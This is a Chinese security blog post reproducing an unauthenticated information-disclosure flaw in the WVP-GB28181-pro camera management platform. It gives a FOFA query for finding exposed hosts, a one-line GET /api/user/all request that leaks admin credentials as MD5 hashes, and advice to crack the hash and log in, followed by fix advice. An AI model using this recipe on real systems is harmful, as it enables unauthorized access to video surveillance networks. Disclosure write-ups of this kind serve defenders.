WVP-GB28181摄像头管理平台 user 信息泄露漏洞复现

已于 2024-05-11 16:27:05 修改
阅读量815 收藏 1
点赞数 4
分类专栏: 漏洞复现 文章标签: 安全 web安全
于 2024-05-11 16:26:58 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41904294/article/details/138720266
版权

0x01 产品简介

GB28181是公共安全视频监控联网系统信息传输、交换、控制技术要求的标准。该标准主要定义了基于IP网络的音视频监控系统的整体架构,包括前端设备、存储设备、管理平台等组成部分,以及设备接入、流媒体传输、信令交互、存储管理、安全防护和平台管理等方面的要求。

0x02 漏洞概述

WVP-GB28181-pro开源物联网摄像头管理平台api/user接口村存在信息泄露漏洞,攻击者可利用漏洞获取当前系统管理员用户名及密码进行登录系统,使系统处于极不安全的状态

0x03 复现环境

FOFA:body="国标28181"

0x04 漏洞复现

PoC

GET /api/user/all HTTP/1.1
Host: your-ip

解密密码md5值即可登录后台

0x05 修复建议

删除该接口或设置访问控制

升级至安全版本

0xSecl
关注
  • 4
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
专栏目录
订阅专栏
漏洞复现WVP视频平台未授权漏洞
晚风不及你
06-11 91
WVP视频平台api/user存在未授权访问漏洞,攻击者可利用漏洞获取当前系统管理员用户名及密码进行登录系统。
wvp-GB28181:WEB视频平台是一个基于GB28181-2016标准实现的网络视频平台,负责实现核心信令与设备管理后台部分,支持NAT穿透,支持海康,大华,宇视等品牌的IPC,NVR,DVR接入。流媒体服务基于ZLMediaKit-https
03-19
wvp Web视频平台是一个基于GB28181-2016标准实现的网络视频平台,负责实现核心信令与设备管理后台部分,支持NAT穿透,支持海康,大华,宇视等品牌的IPC,NVR,DVR接入。流媒体服务基于ZLMediaKit- 前端展示基于MediaServerUI- 应用场景: 主要应用在IPC等设备没有固定IP地址,但需要在互联网中观看的场景。要求IPC设备可以访问互联网,有云服务器用于部署本服务。预计7个月可以达到商用级别的文档性 支持特性: 1,视频预览2,云台控制(方向,缩放控制) 3,视频设备信息同步4,离在线监控5,录像查询和回放(基于NVR \ DVR,暂不支持快进,seek操作) 6,无人观看自动断流 2020路线图: 5月中旬-视频快照(基于NVR \ DVR),设备认证(基于密码) 5月下旬-设备报警6月上旬-流媒体认证(ZLM推流,取流) 6月下旬-语音对​
某购物商城系统commodtiy接口处存在任意文件上传漏洞
weixin_43167326的博客
05-10 730
某购物商城系统commodtiy接口处存在任意文件上传漏洞,恶意攻击者可以上传恶意软件,例如后门、木马或勒索软件,以获取对服务器的远程访问权限或者破坏系统,对服务器造成极大的安全隐患。
漏洞复现GB28181摄像头管理平台api接口处存在未授权漏洞
weixin_52204925的博客
05-09 883
GB28181摄像头管理平台api接口处存在未授权漏洞,恶意攻击者可以通过此漏洞获取到登录信息,从而登录到后台,使服务器处于不安全的状态
WVP-GB28181摄像头管理平台存在敏感信息泄露
weixin_43167326的博客
05-16 670
GB28181是公共安全视频监控联网系统信息传输、交换、控制技术要求的标准。该标准主要定义了基于IP网络的音视频监控系统的整体架构,包括前端设备、存储设备、管理平台等组成部分,以及设备接入、流媒体传输、信令父旦、仔储管理安全防护和平台管理等方面的要求。。
针对常见网络摄像头漏洞扫描工具
潇湘信安的博客
09-16 1373
主要针对网络摄像头漏洞扫描框架,目前已集成海康、大华、宇视、dlink等常见设备。Windows 仍有部分bug,Linux 与 Mac可以正常使用。请确保安装了3.7及以上版本的Python,推荐3.8
海康摄像头CVE-2021-36260漏洞复现
qq_50854662的博客
01-09 7141
海康摄像头CVE-2021-36260漏洞复现
wvp-gb28181系统说明
sunny_02的专栏
10-31 4512
查询设备状态查询设备信息查询目录列表请求预览视频流。
GB28181 —— 1、Ubuntu20.04下使用ZLMediaKit+WVP搭建GB28181流媒体监控平台(连接带云台摄像机)
wx微信公众号“码农总动员”,获取更多编程知识
02-23 2674
GB28181 —— Ubuntu20.04下使用ZLMediaKit+WVP搭建GB28181流媒体监控平台
wvp-GB28181_wvp-gb28181_wvpgb28181_GB28181_
10-04
gb28181服务端,包含初始化,注册,注销,心跳,invite等功能模块
wvp-GB28181-pro 适配支持 SQlite3 数据库 支持wvp-GB28181-pro 2.6.9
02-28
wvp-GB28181-pro 适配支持 SQlite3 数据库 支持wvp-GB28181-pro 2.6.9
wvp-GB28181-pro-2.7.2jar包
最新发布
06-07
mysql 8.0.27 redis 4.0.9
wvp-GB28181-pro最新编译
02-18
wvp-GB28181-pro最新编译
城市摄像头安全漏洞
andychuen的专栏
01-02 2330
1.摄像头安全漏洞:弱口令、使用相同固件、分布广易受攻击   网络安全创新企业华顺信安,于本周四发布《网络空间测绘系列—2018年摄像头安全报告》。这是首个基于国内网络空间测绘技术的摄像头安全报告。     互联网摄像头暴露情况   报告显示,摄像头已经无所不在,全球228个国家和地区,8063个城市,2635万个摄像头暴露在公网。DDoS攻击、机构安全风险、个人隐私泄露等事件层...
漏洞复现】Hikvision摄像头产品代码执行漏洞(CVE-2021-36260)
晚风不及你
01-20 2320
Hikvision(海康威视)是一家在中国颇具影响力的安防公司,其网络摄像头产品在市场上占据了相当大的份额。Hikvision的网络摄像头产品线非常丰富,涵盖了各种型号和功能,以满足不同用户的需求。
Linux平台下搭建GB28181服务器(WVP+ZLMediakit)
yang1fei2的博客
08-11 4331
GB28181(国标28181),全称为《中华人民共和国公共安全视频监控联网系统技术要求》,是中国国家标准委员会发布的一个针对公共安全视频监控领域的标准框架。该标准指导了视频监控设备之间的联网互通,统一管理和控制,并提供了一套包括设备接入、设备管理、视频传输、事件告警等功能要求。
wvp-GB28181-pro 学习笔记
qq_34813134的博客
09-11 1381
支持浏览器无插件播放摄像头视频。支持国标设备(摄像机、平台、NVR等)设备接入 支持非国标(onvif, rtsp, rtmp,直播设备等等)设备接入,充分利旧。支持国标级联。多平台级联。跨网视频预览。支持跨网网闸平台互联。
详细列出centos部署wvp-gb28181-pro
05-11
部署wvp-gb28181-pro需要以下步骤: 1. 安装CentOS:首先需要安装CentOS操作系统,可以选择最新版本的CentOS 7或8。 2. 安装依赖库:在CentOS上安装wvp-gb28181-pro所需的依赖库,包括FFmpeg、OpenSSL、libxml2、libcurl、libevent、zlib、pcre等。可以使用以下命令安装: ```shell yum install -y epel-release yum install -y openssl-devel libxml2-devel libcurl-devel libevent-devel zlib-devel pcre-devel ``` 3. 下载wvp-gb28181-pro:从wvp-gb28181-pro的官方网站下载wvp-gb28181-pro的源码,解压缩到指定目录。 4. 编译wvp-gb28181-pro:在wvp-gb28181-pro的源码目录下执行以下命令编译: ```shell ./configure make make install ``` 这将会编译并安装wvp-gb28181-pro到系统中。 5. 配置wvp-gb28181-prowvp-gb28181-pro的配置文件位于/etc/wvp-gb28181-pro下,可以根据需要编辑配置文件。 6. 启动wvp-gb28181-pro:可以使用以下命令启动wvp-gb28181-pro: ```shell systemctl start wvp-gb28181-pro ``` 启动后可以使用以下命令查看wvp-gb28181-pro的状态: ```shell systemctl status wvp-gb28181-pro ``` 7. 配置防火墙:如果系统开启了防火墙,需要打开wvp-gb28181-pro所需的端口。可以使用以下命令开启端口: ```shell firewall-cmd --zone=public --add-port=5060/udp --permanent firewall-cmd --reload ``` 这将会开启5060端口,如果需要开启其他端口,请根据需要修改以上命令。 以上就是在CentOS上部署wvp-gb28181-pro的完整步骤。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0xSecl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值